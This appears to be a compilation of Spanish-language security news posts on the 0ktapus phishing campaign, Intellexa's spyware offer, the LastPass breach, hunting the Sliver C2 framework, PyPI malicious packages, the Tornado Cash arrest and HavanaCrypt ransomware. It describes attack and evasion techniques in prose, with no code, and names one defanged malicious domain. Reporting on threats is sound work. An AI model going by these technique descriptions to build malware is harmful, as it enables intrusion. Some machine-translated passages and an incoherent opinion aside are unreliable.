En general, la empresa confirmó que detectó 169 dominios únicos involucrados en esta campaña ‘0ktapus’. El equipo lo hizo analizando los recursos utilizados para crear esos sitios, algunos de los cuales (imágenes, fuentes o scripts) eran lo suficientemente únicos como para encontrar otros sitios usando el mismo kit de phishing.

“En este caso, encontramos una imagen que es utilizada legítimamente por sitios que aprovechan la autenticación Okta, siendo utilizada por el kit de phishing”, explicó Group-IB.

En términos de organizaciones objetivo, la gran mayoría de las víctimas de 0ktapus estaban ubicadas en los EE. UU., seguidas por el Reino Unido y Canadá. La mayoría de ellos eran proveedores de TI, desarrollo de software y servicios en la nube, pero también había algunas empresas financieras en la lista.

Para evitar convertirse en una víctima de 0ktapus, Group-IB dijo que los usuarios finales (especialmente aquellos con derechos de administrador) siempre deben verificar dos veces la URL del sitio donde ingresan las credenciales. Los investigadores de seguridad también aconsejaron a las empresas que implementaran una clave de seguridad compatible con FIDO2 para la autenticación multifactor (MFA).

El aviso compilado por Group-IB se basa en una solicitud de uno de sus clientes, así como en informes públicos sobre 0ktapus de Twilio y Cloudflare .

Group-IB también ha descubierto recientemente una gran campaña de fraude de inversiones dirigida a víctimas europeas a través de canales en línea y telefónicos.

El cargo Nueva campaña de phishing 0ktapus apunta a las credenciales de identidad de Okta y así funciona apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

Venden servicios para hackear cualquier teléfono iPhone o Android y tener acceso a él por un año por solo $8 millones

Los documentos filtrados parecen mostrar una compañía de spyware poco conocida que ofrece servicios que incluyen exploits para dispositivos Android e iOS por 8 millones de euros.

Los intermediarios de exploits y los proveedores mercenarios de spyware han sido el centro de atención recientemente, principalmente debido a las revelaciones en torno al uso de la controvertida solución Pegasus de la empresa israelí NSO Group.

Uno de los competidores relativamente nuevos de NSO es Intellexa, una empresa fundada por el empresario israelí Tal Dilian. La empresa afirma en su sitio web que ofrece tecnologías que permiten a las fuerzas del orden y las agencias de inteligencia “ayudar a proteger a las comunidades”. La compañía dice que tiene su sede en la UE y está regulada, con seis sitios y laboratorios de I+D en Europa.

Vx-undergroud, que proporciona código fuente de malware y otros recursos de ciberseguridad, publicó algunas capturas de pantalla en Twitter el miércoles que muestran varios documentos que aparentemente representan una propuesta comercial de Intellexa.

Leaked documents online show the purchase (and documentation of) an $8,000,000 iOS Remote Code Execution 0day exploit pic.twitter.com/lhmc8QdfGv

— vx-underground (@vxunderground) August 24, 2022

Los documentos, etiquetados como privados y confidenciales, describen servicios para la extracción remota de datos desde dispositivos Android e iOS. Específicamente, la oferta es para explotaciones remotas basadas en navegador con un solo clic que permiten a los usuarios inyectar una carga útil en dispositivos móviles Android o iOS. La breve descripción sugiere que la víctima tiene que hacer clic en un enlace para que se entregue el exploit.

La oferta incluye 10 infecciones concurrentes para dispositivos iOS y Android, así como una “revista de 100 infecciones exitosas”. Los documentos filtrados también muestran una lista parcial de dispositivos Android contra los que supuestamente funcionaría un ataque.

Los documentos dicen que los exploits deberían funcionar en iOS 15.4.1 y la última actualización de Android 12.

Apple lanzó iOS 15.4.1 en marzo, lo que sugiere que la oferta es bastante reciente. Desde entonces, se han lanzado tres actualizaciones de seguridad para el sistema operativo móvil. Esto significa que Apple puede haber parcheado una o más de las vulnerabilidades de día cero utilizadas por el exploit Intellexa iOS, pero también es posible que los exploits ofrecidos por este tipo de empresas permanezcan sin parches durante mucho tiempo.

Si bien algunos han descrito los 8 millones de dólares como el precio de un exploit de iOS, el cliente en realidad obtendría mucho más por el precio. La oferta es para una plataforma completa que incluye capacidades para analizar los datos extraídos por los exploits, así como una garantía de 12 meses.

Los documentos no tienen fecha, pero vx-undergroud dijo que las capturas de pantalla se publicaron en el foro de hackers Ruso XSS el 14 de julio.

Si bien hay mucha información técnica disponible sobre las vulnerabilidades que ofrecen las empresas de spyware, no se sabe mucho sobre lo que cobran a los clientes. 

También se sabe que los corredores de exploits están dispuestos a pagar hasta 2 millones de dólares por exploits de cadena completa para Android e iOS que no requieren ninguna interacción del usuario.

Intellexa fue mencionado el año pasado en un informe de Citizen Lab sobre el uso del spyware Predator para iPhone de Cytrox contra un legislador Griego. Citizen Lab dijo que Cytrox era parte de Intellexa Alliance, que describió como una “etiqueta de marketing para una gama de proveedores de vigilancia mercenarios que surgieron en 2019”.

Fuente: https://ift.tt/he8awW7

El cargo Venden servicios para hackear cualquier teléfono iPhone o Android y tener acceso a él por un año por solo $8 millones apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

LastPass dice que el código fuente fue robado en una filtración de datos. 30 millones de usuarios y 85,000 clientes comerciales afectos

La empresa de software de administración de contraseñas LastPass sufrió una violación de datos que condujo al robo del código fuente e información técnica patentada.

La empresa, que es propiedad de GoTo (anteriormente LogMeIn), reveló la infracción en un aviso en línea publicado el jueves, pero insistió en que las contraseñas maestras de los clientes o los datos cifrados de la bóveda de contraseñas no se vieron comprometidos.

El director ejecutivo de LastPass, Karim Toubba, dijo que el equipo de seguridad de la compañía detectó actividad inusual en partes del entorno de desarrollo de LastPass hace dos semanas y lanzó una investigación que confirmó el robo del código fuente.

Del aviso de LastPass :

Determinamos que una parte no autorizada obtuvo acceso a partes del entorno de desarrollo de LastPass a través de una sola cuenta de desarrollador comprometida y tomó partes del código fuente y cierta información técnica patentada de LastPass. Nuestros productos y servicios están funcionando con normalidad.

En respuesta al incidente, implementamos medidas de contención y mitigación, y contratamos a una firma líder en ciberseguridad y análisis forense. Si bien nuestra investigación está en curso, hemos logrado un estado de contención, implementamos medidas de seguridad mejoradas adicionales y no vemos más evidencia de actividad no autorizada.  

Toubba dijo que la compañía está evaluando más técnicas de mitigación para fortalecer su entorno. 

Lo que es más importante, LastPass insiste en que el incidente no comprometió las contraseñas maestras que gestionan el acceso a las bóvedas cifradas en su software insignia de gestión de contraseñas.

“Nunca almacenamos ni tenemos conocimiento de su contraseña maestra”, dijo Toubba, y señaló que LastPass utiliza una arquitectura de conocimiento cero que garantiza que la empresa nunca pueda conocer u obtener acceso a la contraseña maestra de un cliente. 

Dijo que la investigación no ha mostrado evidencia de ningún acceso no autorizado a datos de bóveda encriptados o datos de clientes en el entorno de producción de LastPass.  

El último truco llega inmediatamente después de que los usuarios de LastPass sean objeto de ataques de “relleno de credenciales” que utilizan direcciones de correo electrónico y contraseñas obtenidas de infracciones de terceros.

LastPass reclama más de 30 millones de usuarios y 85.000 clientes comerciales en todo el mundo. 

El cargo LastPass dice que el código fuente fue robado en una filtración de datos. 30 millones de usuarios y 85,000 clientes comerciales afectos apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

Cómo proteger su red de ‘Sliver’: la famosa herramienta utilizada por los hackers después de Cobalt Strike

Microsoft ha observado que el marco de comando y control (C2) de Sliver ahora se está adoptando e integrando en campañas de intrusión por parte de actores de amenazas de estados nacionales , grupos de delitos cibernéticos que apoyan directamente el ransomware y la extorsión , y otros Actores de amenazas para evadir la detección. Han visto a estos actores usar Sliver con Cobalt Strike, o como reemplazo de este. Dada la popularidad de Cobalt Strike como herramienta de ataque, las defensas contra él también han mejorado con el tiempo. Por lo tanto, Sliver presenta una alternativa atractiva para los actores que buscan un conjunto de herramientas menos conocidas con una barrera de entrada baja.

Sliver, que se hizo público por primera vez a fines de 2019 y se anunció a los profesionales de la seguridad, es un marco de código abierto que está disponible en GitHub e incluye muchas características comunes del marco C2, como soporte para múltiples operadores simultáneos, multiples tipos de oyentes, extensiones desarrolladas por el usuario y generacion de carga util. . Desde diciembre de 2020, han observado a los actores de amenazas adoptando Sliver en su arsenal.

Entre sus adoptantes se encuentra el prolífico afiliado de ransomware-as-service (RaaS) DEV-0237 . Más recientemente, han visto a actores de ciberdelincuencia vinculados históricamente al ransomware operado por humanos que ahora entregan Sliver y varias herramientas posteriores al compromiso utilizando el malware Bumblebee (también conocido como COLDTRAIN) como un cargador de acceso inicial. 

Compartimos cómo los investigadores detrás de Microsoft Defender Experts for Hunting analizaron Sliver y usaron ataques simulados en laboratorio y actividad de amenazas del mundo real para crear consultas de caza para mostrar Sliver y otros frameworks C2.

Caza de amenazas: parte arte (ifact), toda ciencia

Para los investigadores de seguridad, existe una distinción entre la caza y la detección. Para las amenazas nuevas, los investigadores intentan lograr un equilibrio entre las reglas de detección de alta fidelidad que identifican una familia de malware, un actor de amenazas o una clase de comportamiento específicos y conocidos, y las reglas de búsqueda de baja fidelidad, que generan más falsos positivos pero también capturan una técnica de manera más genérica. y sus derivados.

Los actores de amenazas utilizan frameworks C2 para administrar su acceso a hosts y redes comprometidos durante una intrusión. Un marco C2 generalmente incluye un servidor que acepta conexiones de implantes en un sistema comprometido y una aplicación cliente que permite a los operadores de C2 interactuar con los implantes y ejecutar comandos maliciosos.

Muchos actores de amenazas integran opciones de marco C2 públicas y de código abierto en su arsenal porque tienen una barrera de entrada baja y ofrecen varias ventajas para los atacantes, como bajo costo, facilidad de modificación y atribución difícil. Como se mencionó anteriormente, Sliver es uno de esos frameworks de código abierto. Aunque Sliver es algo nuevo, los TTP que implementa son comunes en muchos frameworks.

Sliver, como muchos frameworks C2, admite varios protocolos de red, como DNS, HTTP/TLS, MTLS y TCP. También puede aceptar conexiones de implantes u operadores y alojar archivos para hacerse pasar por un servidor web benigno.

El primer paso para probar cualquier marco C2 es iniciar oyentes y escanearlos para identificar anomalías. Algunos artefactos comunes son combinaciones únicas de encabezados HTTP y hashes JARM , el último de los cuales son técnicas activas de huellas dactilares para servidores TLS. RiskIQ ha compartido una metodología de este tipo para la detección de Sliver y Bumblebee .

cargas útiles

Dado que Sliver está escrito en el lenguaje de programación Go (GoLang), sus implantes son compatibles entre plataformas. De forma predeterminada, los operadores pueden generar implantes en varios formatos, incluidos:

• Shellcode
• Ejecutable
• Biblioteca compartida/DLL
• Servicio

Sliver también admite etapas : cargas útiles más pequeñas con pocas funciones integradas que están destinadas principalmente a recuperar y lanzar un implante completo. Muchos frameworks C2 utilizan Stagers para minimizar el código malicioso que se incluye en una carga útil inicial (por ejemplo, en un correo electrónico de phishing). Esto puede hacer que la detección basada en archivos sea más desafiante.

Sin embargo, los operadores no necesitan usar la DLL predeterminada de Sliver o las cargas útiles ejecutables. Los actores de amenazas motivados pueden generar un shellcode Sliver e incrustarlo en cargadores personalizados como Bumblebee que luego ejecuta el implante Sliver en un sistema comprometido. Los ingenieros de detección pueden crear detecciones específicas del cargador o, si el código shell no está ofuscado, reglas para la carga útil del código shell que está incrustado en el cargador.

Puede seguir revisando en el apartado de Microsoft security acerca de las estrategias tomadas contra los ataques de ramsonware.

El cargo Cómo proteger su red de ‘Sliver’: la famosa herramienta utilizada por los hackers después de Cobalt Strike apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

Una nueva demanda colectiva confirma que las empresas de Jack Dorsey “Twitter” como “Block” son “negligentes” en la protección de los datos de los usuarios

La empresa antes conocida como Square se enfrenta a una demanda colectiva en la que se acusa a la empresa del cofundador de Twitter de ser “negligente”. Se produce cuando un exejecutivo de seguridad de Twitter lanzó acusaciones explosivas sobre las formas en que maneja los datos.

El mismo día que un exjefe de seguridad denunció lo que, según él, eran fallas de seguridad “atroces” en Twitter, se presentó una demanda alegando que otra empresa fundada por el multimillonario Jack Dorsey también fue “negligente” en la protección de los datos de los usuarios. Block, Inc., propietaria de las tecnologías de pago Cash App y Square, fue demandada en una demanda colectiva el martes relacionada con una violación de Cash App Investing en diciembre de 2021, en la que un empleado que aún tenía acceso a los datos de 8,2 millones de usuarios robó informes de la empresa incluso después de su partida.

El alegato central de la demanda es que el empleado pudo tomar los datos debido a prácticas de seguridad deficientes. Según la divulgación del hackeo de Block en abril de 2022, el ex empleado pudo obtener informes de Cash App Investing, la función de inversión de Cash App permite a los usuarios comprar y vender acciones fácilmente a través de la popular herramienta de pago. Los informes incluían el nombre completo de los usuarios y el número de cuenta de corretaje, un número de identificación único asociado con la actividad bursátil de un cliente. Para algunos clientes, los datos filtrados también incluían el valor de la cartera de corretaje, las tenencias y la actividad de negociación de acciones para un solo día de negociación. No se perdieron contraseñas ni números de Seguro Social.

La demanda ahora vincula esta violación de datos con el posterior robo de las cuentas de Cash App de los usuarios. Dos usuarios de Cash App Investing, que son los principales demandantes de la demanda colectiva, argumentan que después de la violación, los usuarios fueron objeto de “una amplia gama de actividades fraudulentas” en sus cuentas de Cash App.

Una de las demandantes, Michelle Salinas, una usuaria de Texas, dijo que tuvo múltiples transacciones fraudulentas en su cuenta de Cash App luego del incidente de diciembre de 2021, todas ellas por compras en Amazon por un total de $50. Ella dijo que Block no le había reembolsado. Otro demandante, Raymel Washington, de Chicago, dijo que había visto casi $395 en transacciones no autorizadas en su Cash App en junio de 2022. Él tampoco pudo recuperar el dinero de Cash App, según la demanda.

Sin embargo, la demanda no proporciona evidencia que vincule esos robos directamente con el hackeo de 2021. Según Vice , otros usuarios de Cash App se han enfrentado a los mismos problemas después de que sus cuentas fueran hackeadas

Block reveló el hackeo en una presentación ante la SEC cuatro meses después de la violación original, y la demanda colectiva del martes planteó problemas con esta brecha. “Block no ofreció ninguna explicación por la demora de cuatro meses entre el descubrimiento inicial de la violación y la notificación tardía a los clientes afectados, lo que resultó en que los demandantes y los miembros de la clase sufrieran daños que de otro modo podrían haber evitado si se hubiera hecho una divulgación oportuna”, dice la demanda. dijo.

La demanda llega menos de un mes después de que Bragar Eagel & Squire, PC, un bufete de abogados de derechos de los accionistas, anunciara que estaba investigando la violación y si Block había protegido efectivamente o no los datos de los usuarios como había prometido.

Algunas de las acusaciones dirigidas a Block son similares a las presentadas por el destacado experto en seguridad Peiter “Mudge” Zatko contra su ex empleador Twitter en una denuncia de denunciantes esta semana. En particular, tanto Block como Twitter fueron acusados ​​​​de no bloquear los datos de los usuarios de los internos. Supuestamente, ambos tampoco cumplieron con las pautas de la Comisión Federal de Comercio sobre la seguridad de los datos de los clientes.

Block no respondió a una solicitud de comentarios sobre la demanda colectiva.

Después de que el noticias informaran sobre las acusaciones de Zatko el lunes, Twitter dijo que había sido despedido “por liderazgo ineficaz y desempeño deficiente” y que su informe del denunciante “está plagado de inconsistencias e imprecisiones y carece de contexto importante”. Afirmaron que las “acusaciones y el momento oportunista de Zatko parecen diseñados para captar la atención e infligir daño a Twitter, sus clientes y sus accionistas”. La compañía no entró en detalles sobre cuáles eran esas inexactitudes.

Aunque dos empresas que fundó están bajo fuego por sus prácticas de seguridad, Dorsey sigue siendo uno de los multimillonarios más influyentes de la tecnología. Según Forbes , tiene un valor de poco menos de $ 5 mil millones, en gran parte gracias a Block en lugar de Twitter, del cual posee poco más del 2%. Posee casi el 10% de Block, que actualmente tiene una capitalización de mercado de $42 mil millones, $12 mil millones más que Twitter.

El cargo Una nueva demanda colectiva confirma que las empresas de Jack Dorsey “Twitter” como “Block” son “negligentes” en la protección de los datos de los usuarios apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

Otra vez los atacantes comprometen proyectos legítimos de Python PyPI

PyPI, el repositorio oficial de software de terceros para paquetes de Python, advierte sobre una campaña de phishing dirigida a sus usuarios.

“Además, hemos determinado que algunos mantenedores de proyectos legítimos se han visto comprometidos y se ha publicado malware como la última versión de esos proyectos. Estos lanzamientos se eliminaron de PyPI y las cuentas de mantenimiento se congelaron temporalmente”, señaló el equipo de PyPI .

Today we received reports of a phishing campaign targeting PyPI users. This is the first known phishing attack against PyPI.

We’re publishing the details here to raise awareness of what is likely an ongoing threat.

— Python Package Index (@pypi) August 24, 2022

Los lanzamientos maliciosos de los que tienen conocimiento actualmente son:

• Exotel – v0.1.6
• correo no deseado: v2.0.2 y v4.0.2
• traductor profundo – v1.8.5

También agregaron que han “eliminado varios cientos de typosquats que se ajustan al mismo patrón”.

I can tell you exactly how many: https://t.co/9JHjTd7nLm https://t.co/Y5m8UooYn3 pic.twitter.com/5lMUJX8qZp

— Dustin Ingram (@di_codes) August 24, 2022

La campaña de phishing

El mensaje de phishing llegó por correo electrónico, advirtiendo a los usuarios que deben realizar una “validación del paquete” para evitar que sus paquetes PyPI se eliminen del repositorio en línea:

Un clic en el enlace proporcionado llevó a las víctimas a un sitio de phishing que imitaba la página de inicio de sesión de PyPI .

“No podemos determinar si el sitio de phishing fue diseñado para transmitir códigos de dos factores basados ​​en TOTP. Las cuentas protegidas por claves de seguridad de hardware no son vulnerables”, dijo el equipo de PyPI.

Según el investigador de seguridad de Checkmarx, Aviad Gershon, “El intento de phishing y los paquetes maliciosos están vinculados por el dominio linkedopports[.]com , que aparece en el código del paquete malicioso y también funciona como la ubicación a la que el sitio de phishing intenta enviar los datos robados. cartas credenciales.”

Los paquetes maliciosos intentan descargar y ejecutar un archivo desde otra URL, que es atípicamente grande y está firmado con una firma válida, agregó, y señaló que descubrieron otro dominio no informado relacionado con la infraestructura de este atacante, que aloja un sitio que imita el sitio web de la aplicación de billetera criptográfica LedgerLive.

Aparentemente, Gershon también compartió una lista de los paquetes de errores tipográficos maliciosos que detectó durante la investigación.

Respuesta de PyPI

Los actores de amenazas (y ocasionalmente los investigadores de seguridad ) intentan constantemente, y a veces lo logran , obtener paquetes maliciosos en PyPI.

“Estamos revisando activamente los informes de nuevos lanzamientos maliciosos y nos aseguramos de que se eliminen y se restablezcan las cuentas del mantenedor. También estamos trabajando para proporcionar funciones de seguridad como 2FA más frecuentes en los proyectos de PyPI”, dijo el equipo de PyPI tras este último incidente de seguridad.

What we’re doing: We’re actively reviewing reports of new malicious releases, and ensuring that they are removed and the maintainer accounts restored. We’re also working to provide security features like 2FA more prevalent across projects on PyPI.

— Python Package Index (@pypi) August 24, 2022

PyPI (es decir, Python Software Foundation, que ejecuta el repositorio) pronto comenzará a requerir que los mantenedores de proyectos/paquetes críticos tengan 2FA habilitado para publicarlos, actualizarlos o modificarlos, y está distribuyendo 4000 claves de seguridad de hardware para ayudarlos.

El equipo ha instado a los usuarios que han caído en el phish a restablecer su contraseña y códigos de recuperación 2FA, y a revisar su cuenta en busca de actividad sospechosa.

El cargo Otra vez los atacantes comprometen proyectos legítimos de Python PyPI apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

Lanzan campaña de change.org para liberar a Alexey Pertsev desarrollador de Tornado Cash

Los miembros de la comunidad de criptomonedas han lanzado una campaña pidiendo la liberación del desarrollador de Tornado Cash, Alexey Pertsev.

El 10 de agosto de 2022, el Servicio de Información e Investigación Fiscal (FIOD) de los Países Bajos arrestó a Alexey Pertsev por su “participación en ocultar flujos financieros criminales y facilitar el lavado de dinero mediante la mezcla de criptomonedas a través del servicio descentralizado de mezcla de Ethereum, Tornado Cash”. Las autoridades no han acusado a Persev de ningún delito y pueden mantenerlo en la cárcel durante 110 días sin acusarlo.

Al momento de escribir este artículo, una petición de change.org que pide la liberación de Pertsev tiene más de 2300 firmas. Al menos 50 personas se unieron a una protesta para difundir el caso de Pertsev en la Plaza Dam de Ámsterdam el 20 de agosto de 2022.

“El desarrollador de blockchain Alex Pertsev fue arrestado por la policía holandesa en Ámsterdam el 10 de agosto y se sospecha que creó un código de código abierto que se desarrolló para el proyecto Tornado Cash y fue utilizado indebidamente para actividades ilegales por parte de un tercero, pero un desarrollador no tiene control sobre cómo se usa posteriormente su código de fuente abierta”.

¿Quién es Alex Pertsev?

“Alexey es un programador y un profesional en el campo de la seguridad de la información que vive en los Países Bajos. Un participante activo en la comunidad criptográfica. El enfoque principal de la seguridad de la información es la protección equilibrada de la confidencialidad, la integridad y la disponibilidad de los datos, y para él no son solo palabras. Y como una de las áreas de su actividad, participó en auditorías de contratos inteligentes y problemas de seguridad de la red blockchain”.

¿Por qué es importante?

“En nuestra opinión, el arresto de Alex crea un precedente peligroso que podría llevar a que otros desarrolladores de software de código abierto sean procesados ​​en caso de mal uso de estos códigos”.

“El desarrollador no tiene control sobre el uso del código fuente abierto. Así como el fabricante de cuchillos de cocina no es responsable de los asesinatos domésticos. El equipo de Tornado Cash ha desarrollado un servicio de mezcla, pero no lo administra: cualquier usuario puede instalar y ejecutar una aplicación de código abierto”.

Enlaces

En el sitio web setalexfree.nl se incluyen enlaces a la petición change.org y un grupo de Telegram para simpatizantes y fanáticos.

Contexto

“El arresto de la semana pasada del desarrollador de software con sede en Amsterdam Alex Pertsev amenaza con crear un precedente peligroso, ya que los desarrolladores ahora podrían ser responsables si el software que crearon se usa indebidamente”.

¿Por qué es tan importante este caso?

“El software de código abierto, que se publicó bajo licencia libre y puede ser utilizado por cualquier persona y para cualquier propósito, siempre ha sido un importante impulsor de la innovación en el sector tecnológico. Muchos productos populares, como Linux, Mozilla Firefox y VLC Media Player, se desarrollaron como software de código abierto”.

“Los productos de software de código abierto tienen millones de usuarios en todo el mundo, mientras que miles de desarrolladores utilizan código de código abierto en sus proyectos. El software de código abierto es flexible y seguro, ya que cualquiera puede auditarlo, corregirlo y mejorarlo”.

“Ahora, Alex está siendo acusado de crear un código de código abierto que fue utilizado por Tornado Cash, un proyecto que se está investigando en los EE. UU. y Europa. Pero un desarrollador no tiene control alguno sobre cómo se usa posteriormente su código de fuente abierta”.

“Por lo tanto, las acusaciones contra Alex amenazan con acabar con todo el segmento de software de código abierto. Nadie se atreverá a escribir y publicar código de fuente abierta, nadie invertirá en el segmento si pudiera ser responsable del uso de la herramienta que crearon por otras partes”.

---

Me sorprendería si esta campaña influye en alguna decisión del gobierno. Los activistas patrocinados por el estado parecen ser los más exitosos y los únicos activistas. Actualmente, EE. UU. está discutiendo rutas potenciales para que el desarrollador no patrocine en secreto un movimiento que pide su liberación. Tal vez falten pruebas incriminatorias y lo liberen. Pero no será el resultado de una campaña como la descrita en este artículo. Esa es simplemente la realidad de la situación.

El cargo Lanzan campaña de change.org para liberar a Alexey Pertsev desarrollador de Tornado Cash apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente

El nuevo ransomware HavanaCrypt se hace pasar por una actualización de software de Google

El ransomware HavanaCrypt tiene capacidades de exfiltración de datos y hace todo lo posible para evitar el análisis.

Una nueva variedad de ransomware ha estado causando víctimas durante los últimos dos meses, haciéndose pasar por una aplicación de actualización de software de Google y reutilizando una biblioteca de gestión de contraseñas de código abierto para el cifrado. Apodado HavanaCrypt por investigadores de Cybereason , el nuevo programa de ransomware presenta mecanismos de antianálisis, exfiltración de datos y escalada de privilegios, pero no parece estar lanzando una nota de rescate tradicional.

Implementación de HavanaCrypt

Los investigadores no tienen mucha información sobre el vector de acceso inicial porque la muestra que analizaron se obtuvo de VirusTotal, un servicio de escaneo de archivos basado en la web, donde probablemente fue cargada por una víctima. Lo que está claro es que los metadatos del ejecutable malicioso se modificaron para enumerar el editor como Google y el nombre de la aplicación como Actualización de software de Google y, al ejecutarse, crea una entrada de ejecución automática en el registro llamada GoogleUpdate. Según esta información, se podría suponer que el señuelo utilizado para distribuir el ransomware, ya sea por correo electrónico o por Internet, se centra en una actualización de software falsa.

HavanaCrypt está escrito en el lenguaje de programación .NET y utiliza un ofuscador de código binario de código abierto llamado Obfuscar para ocultar nombres de funciones y otros detalles, lo que dificulta la ingeniería inversa. Además, los autores también usaron sus propias funciones de código para ocultar cadenas en el binario.

El malware también verifica si los procesos típicamente asociados con aplicaciones de máquinas virtuales están presentes en el sistema y, si encuentra alguno, verifica las direcciones MAC de la tarjeta de red para ver si coinciden con los adaptadores virtuales conocidos. Estas comprobaciones están destinadas a bloquear el análisis que a menudo implica la ejecución de archivos binarios sospechosos dentro de máquinas virtuales (VM). El programa también contiene un mecanismo que intenta evadir el análisis a través de depuradores.

Está claro que los creadores de HavanaCrypt pusieron mucho esfuerzo en hacer más difícil el análisis estático y automatizado. Si alguna de estas comprobaciones falla, el programa detendrá su ejecución. Si se aprueban las comprobaciones, el ransomware descargará un archivo .txt desde una dirección IP asociada con los servicios de alojamiento web de Microsoft que en realidad es un script para agregar ciertos directorios a la lista de exclusión de análisis de Windows Defender.

Luego intenta eliminar una larga lista de procesos que podrían estar ejecutándose en el sistema. Estos procesos están asociados con aplicaciones populares, como Microsoft Word, clientes de correo electrónico, servidores de bases de datos, máquinas virtuales y agentes de sincronización de datos. El objetivo es borrar los bloqueos del sistema de archivos establecidos por estos programas para que sus archivos puedan cifrarse. El ransomware también elimina todos los puntos de restauración y las instantáneas de volumen para evitar la fácil restauración de archivos.

HavanaCrypt se copia a sí mismo en las carpetas StartUp y ProgramData usando un nombre de 10 caracteres generado aleatoriamente. Luego, el archivo se establece como “Archivo del sistema” y “Oculto” para evitar que se descubra fácilmente, ya que, de forma predeterminada, Windows no mostrará estos archivos en su explorador de archivos.

Cifrado HavanaCrypt

Luego, el ransomware recopila información sobre la máquina infectada que luego se envía a un servidor de comando y control (C2), que le asigna un token de identificación único y genera las claves únicas utilizadas para el cifrado.

La rutina de cifrado en sí se logra mediante el uso de una biblioteca asociada con el administrador de contraseñas KeePass de código abierto. El uso de una biblioteca bien probada en lugar de implementar su propia rutina de cifrado permite a los creadores de HavanaCrypt evitar cometer vulnerabilidades importantes que luego podrían llevar a los investigadores a crear un descifrador gratuito.

El malware recorrerá todos los archivos, directorios, unidades y discos que se encuentren en el sistema y agregará la extensión .Havana a todos los archivos cifrados. Sin embargo, hay una lista de exclusión de carpetas y extensiones de archivos para mantener el sistema funcional.

Curiosamente, aunque el ransomware no parece dejar caer una nota de rescate tradicional, la carpeta Tor Browser está presente en la lista de exclusión de cifrado, lo que sugiere que los atacantes tienen la intención de usar Tor para la filtración de datos o comunicaciones C2.

El cargo El nuevo ransomware HavanaCrypt se hace pasar por una actualización de software de Google apareció primero en Noticias de seguridad informática, ciberseguridad y hacking.

Ver Fuente